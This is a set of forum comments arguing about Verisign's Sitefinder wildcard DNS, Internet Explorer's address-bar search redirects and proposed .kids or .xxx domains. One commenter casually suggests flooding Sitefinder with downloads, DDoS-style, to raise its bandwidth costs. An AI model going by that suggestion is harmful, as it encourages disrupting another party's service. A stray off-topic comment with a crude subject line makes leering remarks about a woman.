That's not what Verisign is doing at all - if a domain name doesn't exist, they're sending you the IP address of a machine that has a web server and stub email server. That has different effects on different protocols, and all of Verisign's PR fluff about "Customers like it" addresses the friendly fuzzy web user interface, not the atrocious misbehaviour for email and other protocols:

• Web browser sends DNS a query, DNS replies with Sitefinder's IP, Web browser sends HTTP to Sitefinder, Sitefinder sends 17KB of friendly dancing Javascript with several suggestions about which domain name you might have meant. It's not perfect (you looked for http://www.nonexistent.com/foo/bar/stuff.html, and Sitefinder is probably just pointing you to www.nonexistence.com and www.non-existent.com or something), not the full path), and it's Verisign's greed rather than Microsoft's or Google's, but it's sometimes better than nothing. GREEDY, ONLY PARTIALLY BROKEN
  
• SSH client sends DNS a query, DNS replies with Sitefinder's IP, client tries to connect to Sitefinder Port 22, Sitefinder gives your client a login prompt, you don't know the password and don't realize you're not talking to h4rd2tyypeK0rr3xtly.com, Sitefinder gives your attempted IP address, timestamp, login and password to the Homeland Security Anti-Hacker Terrorism Police, you get hauled down to Gitmo Bay, they confiscate your PC, and if your lawyer ever gets you back home, your PC has been disassembled into little pieces. STILL EVIL AND BROKEN.
  
• OtherApp client sends DNS a query, DNS replies with Sitefinder's IP, OtherApp client tries to connect to Sitefinder TCP Port 12345, Sitefinder sends a reject but thankfully doesn't call the police, and if OtherApp client has a user interface, it tells the user a message about having trouble connecting, rather than a correct message about the destination not existing. STILL EVIL AND BROKEN.
  
• Outbound SMTP server sends DNS a request, DNS replies with Sitefinder's IP, SMTP connects with Sitefinder:25, Sitefinder SMTP says "We don't do SMTP here, go away" (or maybe some different failure message), and your SMTP server either sends your SMTP client a somewhat puzzling bouncegram, (and maybe you figure out it was just Sitefinder) or in the original implementation, your SMTP server figures it was a just a network glitch and keeps trying for a week, keeps giving you progress bouncegrams, eventually gives you a failure bouncegram.) LESS EVIL, BUT STILL BROKEN.
  
• Inbound SMTP server receives a message purporting to be from nonexistent.com, first-spam-detector function queries DNS, DNS replies with Sitefinder's address, first-spam-detector decides it's ok to let inside the firewall, second-spam-detector burns CPU but doesn't recognize the random buzzwords as spam, recipient gets yet another spam or Outlook virus. STILL EVIL, STILL BROKEN, CAUSED MOST OF THE FLAMAGE.

Spam-harvester traps also hit Sitefinder.

[billstewart]

If you want to have fun annoying spammers, one of the popular methods is to leave attractive-nuisance email addresses around on your web pages (or use CGI scripts that generate lots of these things.) If those addresses are at bogus domains, the spammers or the proxies or zombies they're abusing will do DNS queries, and if Verisign is giving them Sitefinder's IP address, they'll set up SMTP connections to Sitefinder's email-stub server instead of just dropping the connection. This makes it harder for the spamware to detect the trap and annoys Sitefinder.

A DDOSer who wanted to annoy Sitefinder could do random downloads from their site, and unless they've improved on the original Sitefinder, those downloads are 17KB of singing dancing Javascript instead of ~1KB of simple clean html text. If this has a big enough impact on Sitefinder's bandwidth cost, it will encourage them to provide simple clean html instead of their current potentially-dangerous dreck.

Re:And microsoft does this anyway to all windows u

[alien_blueprint]

Bizarre. I guess I really *did* enter a URL, and it went to a search engine, as I recalled.

I guess, if nothing else, this effectively illustrates the problems with taking actions based on what is basically a guess.

If we can't figure out what it's going to do, and get what appear to be contradictory results, what chance does the average user have? The right way to do this is to have a separate text field for searching, which is linked to a search engine that you can select. Then there would be no more guessing games, and no more unintended and annoying behaviour.

I'm equally annoyed that Firefox does this. If anything, their mistake is worse as now there's even a search field next to the URL field. Since that's sitting right there, I *don't* expect the URL field to be doing searches as well.

Re:And microsoft does this anyway to all windows u

[alien_blueprint]

If it's going to do this, it should pop up a dialog the first time, explaining what it's doing, and give you the chance to turn it off right then and there.

Re:And microsoft does this anyway to all windows u

[alien_blueprint]

Really?

Other people have had similar results. It's worth noting that this guy, like me, appears to be in Australia (he was taken to ninemsn.com.au). So perhaps the guessing that IE does has been altered slightly for our version? I'll try it next time I get the chance.

Anyway, this is all right here, posted long before your "contribution", so perhaps you should have read that and so been better informed before you over-reacted?

.kids versus .porn/.sex/.xxx

[TWX]

"Remember, these are the guys that think a "dot porn" and a "dot kids" TLD will actually fix anything."

I disagree with you to a point on the lack of merit to this idea. I think that a .kids or .students or some form of TLD that is managed would work well, especially if it were handled right. Right now, school districts are forced to try to filter the whole Internet to prevent pornographic materials (and I'm not talking art, I'm talking Tawnee Stone, god bless her soul:) from being easily accessible. If a heavily restricted .kids or .elem or the like domain were created, schools could trust the content of the domain. It'd be similar to the .museum domain. An organizational body could punish or retract domains based on abuses, and the body could work to establish actual guidelines for acceptibility. Granted, it'd be just as political as anything else bodies do, but at least there'd be a chance for it to work right.

The trouble with trying to make porn domains is that states could enact laws that prohibit ISPs from allowing traffic to sites that are so easily identified, which would be censorship. It would also be difficult to get pornographers to make use of the domain anyway, since a lot of content mirrored isn't exactly staying within copyright guidelines, and I would imagine that someone engaging in copyright violations wouldn't want to make themselves stand out that clearly.

Re:.kids versus .porn/.sex/.xxx

[NoMoreNicksLeft]

And everything a kid could reasonably want would be included in this .kids domain?

Hardly, dotcom sits would dwarf that TLD 10,000 to 1. So the kid still has to beg to get access to the site he needs to be able to do a essay. No help there. A .kids TLD (if the only one they're allowed to use) is the same thing as restricting them from the internet entirely. At that point, you might as well talk about creating a seperate K-12 internet strictly for school use.. while not qualitatively different from a .kids TLD, it at least is a bit more clear and honest what is happening.

Re:Michael Jackson touched my penis

Maybe Ai would (although she gets bonus points for bubbles), but you've got to admit Nozomi's cheerfulness (a salute!) in the face of...well, her face...is just adorable. I'd give her a hug if that stuff didn't belong to other guys. (she's a smart girl too, that looks like a raincoat she's wearing)

Re:And microsoft does this anyway to all windows u

[damiam]

Firebird/fox doesn't use Google because it's the #1 search engine, they use it because it's the best search engine.

Re:And microsoft does this anyway to all windows u

[alien_blueprint]

Under IE6, entering "www.randomdomainname.org" into the URL field takes me to:

http://search.ninemsn.com.au/dnserror.aspx?FORM= DN SAS&q=www.randomdomainname.org

Re:And microsoft does this anyway to all windows u

[alien_blueprint]

If you type in a proper domain name, IE will just give you a "This page cannot be displayed - Cannot find server or DNS Error". It only tries to do a search if you type in non domain name type expressions. eg a phrase with spaces or a single word without any dots in it which doesn't match a local host

This doesn't appear to be true.

If I enter "www.randomdomainname.org", I get:

http://search.ninemsn.com.au/dnserror.aspx?FORM= DN SAS&q=www.randomdomainname.org

Please *try* these things before posting misleading rubbish

Looks like it wasn't rubbish at all, doesn't it? And other people report exactly the same thing.

that will only spark further trollish messages

The irony is killing me. Now, since I'm not a reactionary zealot, I'm not going to assume you are being deliberately misleading, but that there's some difference between versions of MSIE and the guessing games they play with the URL field.

Re:And microsoft does this anyway to all windows u

[Green+Light]

Ack! Doesn't anyone get it??? The web browser is not the only DNS client that "asks for the numerical address to which the domain name is bound".

When the SMTP server goes to check the e-mail senders alleged domain, it does not want to get a bogus answer just because VeriSign wants to muck with the system in search of some profit!

Re:And microsoft does this anyway to all windows u

[JuggleGeek]

And the text on that page starts with "We can't find "www.randomdomainname.org".

Not to mention, not all MS users are IE users. I, for instance, use Opera, which simply errors on an unknown URL.

Regardless, you're claim is that they redirect and don't even tell you they did it. Quote "IE will take you immediately to a search engine without displaying any error message." - posted by Alien_Blueprint.

Again, I call bullshit. Tell the truth, and you won't get pissed off when people say "That's not true".

Re:And microsoft does this anyway to all windows u

[alien_blueprint]

Regardless, you're (sic) claim is that they redirect and don't even tell you they did it

Look at the URL. It clearly takes you to search.ninemsn.com.au. That is the fundamental problem. Understand? Try it with something where the search succeeds, and you won't even see an error. But error or not, going to another page is behaviour that is just broken.

Again, I call bullshit. Tell the truth, and you won't get pissed off when people say "That's not true".

Honestly I don't have time to respond to this nonsense if you can't behave like a grown-up person. I refuse to waste my time on clowns, so spew your vitriol in your reply if you like, but I won't be responding.

Re:And microsoft does this anyway to all windows u

[fyonn]

not at all. DNS == Domain Name Service ie a server generally contactable on port 53/udp somewhere that you query for info. a hosts file is a text file on your system (you knew this of course). now admittedly both are accessed by the resolver libraries but they also access NIS as well can't it, and other information services if correctly complied to do so.

I'd say you're not using DNS until you send a DNS query packet. it's like you're not using dns if you log into a DNS server and read the zone files by hand.

or am I wrong?

dave

Re:And microsoft does this anyway to all windows u

[JuggleGeek]

It clearly takes you to search.ninemsn.com.au.

Yes, it does. And when you read the page it takes you to it clearly states We can't find "www.randomdomainname.org". That doesn't fit with your previous claim "IE will take you immediately to a search engine without displaying any error message", which was the post that I called BS on.

IE does take you to a search engine - but it does display an error message. And MS doesn't do it to all windows users, as the subject line claims - they do it to IE users, a subset of windows users. Many (most?) of those users probably find it useful.

This is a browser issue that has nothing to do with Verisign/Sitefinder. Don't like how IE handles it? I don't blame you. There are other things I don't like about IE, which is why I use Opera. However, disliking MS or IE is no reason to make up fiction and try to pass it off as truth.

BTW, I'm not a clown - just a juggler. :^) I'm a grown up with a bad attitude about people who just make things up. If you are going to get upset when people point out that what you are posting is, in fact, not true, perhaps you should be a bit more honest when you post in the first place. I'm not trying to piss you off, but what you said is simply not true.

Re:And microsoft does this anyway to all windows u

[alien_blueprint]

This is a browser issue that has nothing to do with Verisign/Sitefinder. Don't like how IE handles it? I don't blame you. There are other things I don't like about IE, which is why I use Opera. However, disliking MS or IE is no reason to make up fiction and try to pass it off as truth.

I never made stuff up, or tried to pass it off as truth. You need to go back, and see that I said "IIRC" before that all-important (too you) sentence. I honestly only remembered it jumping to the search page - perhaps that time I'd done a typo like "slashdotorg" or something. If you do something like that, you go straight to a search results page.

You shouldn't jump to conclusions about whether I'm trying to bash MS for fun. I don't particularly hate MS or IE. I just prefer Unix-like systems, as that's my background and I find it a nice developer environment.

I was only trying to work out what Firefox was doing, in fact, which is what this whole thing was about for me. That's all I was really interested in - I only mentioned IE's behaviour because I didn't think Firefox did that and was trying to work out why the poster thought it did.

BTW, I'm not a clown - just a juggler. :^) I'm a grown up with a bad attitude about people who just make things up. If you are going to get upset when people point out that what you are posting is, in fact, not true, perhaps you should be a bit more honest when you post in the first place. I'm not trying to piss you off, but what you said is simply not true.

Again, I did say "IIRC". "If I recall correctly." I could only remember it going off to some search site or other - I *thought* that was fairly clear. I wasn't just making stuff up for fun or out of hatred of Redmond or whatever - that's what just I remembered, but since I couldn't check I stuck IIRC in front, so I consider that statement to be completely honest.

An aside - IE *still* goes off to another site in order to display this "error message" though. That's just as bad as rushing off to a search results page to me. It shouldn't go to *any* site, but just display an error dialog!

Re:And microsoft does this anyway to all windows u

[JuggleGeek]

IE *still* goes off to another site in order to display this "error message" though. [snip] It shouldn't go to *any* site, but just display an error dialog!

Tools, Internet Options, Advanced, and in the section titled "Search from the Address Bar" click on "Do not search from the address bar" and you'll get that result.

That works under Win98/IE6.0. I dunno about other OS's or other versions of IE.

Hey! I'm a user...

[Rich+Klein]

...and I didn't like Sitefinder! Please, Verisign, don't bring it back!

Re:And microsoft does this anyway to all windows u

[Paradise+Pete]

When you type in a wrong address at the moment which doesn't exist

Wouldn't that require some sort of space-time anomaly? Those are hard to come by.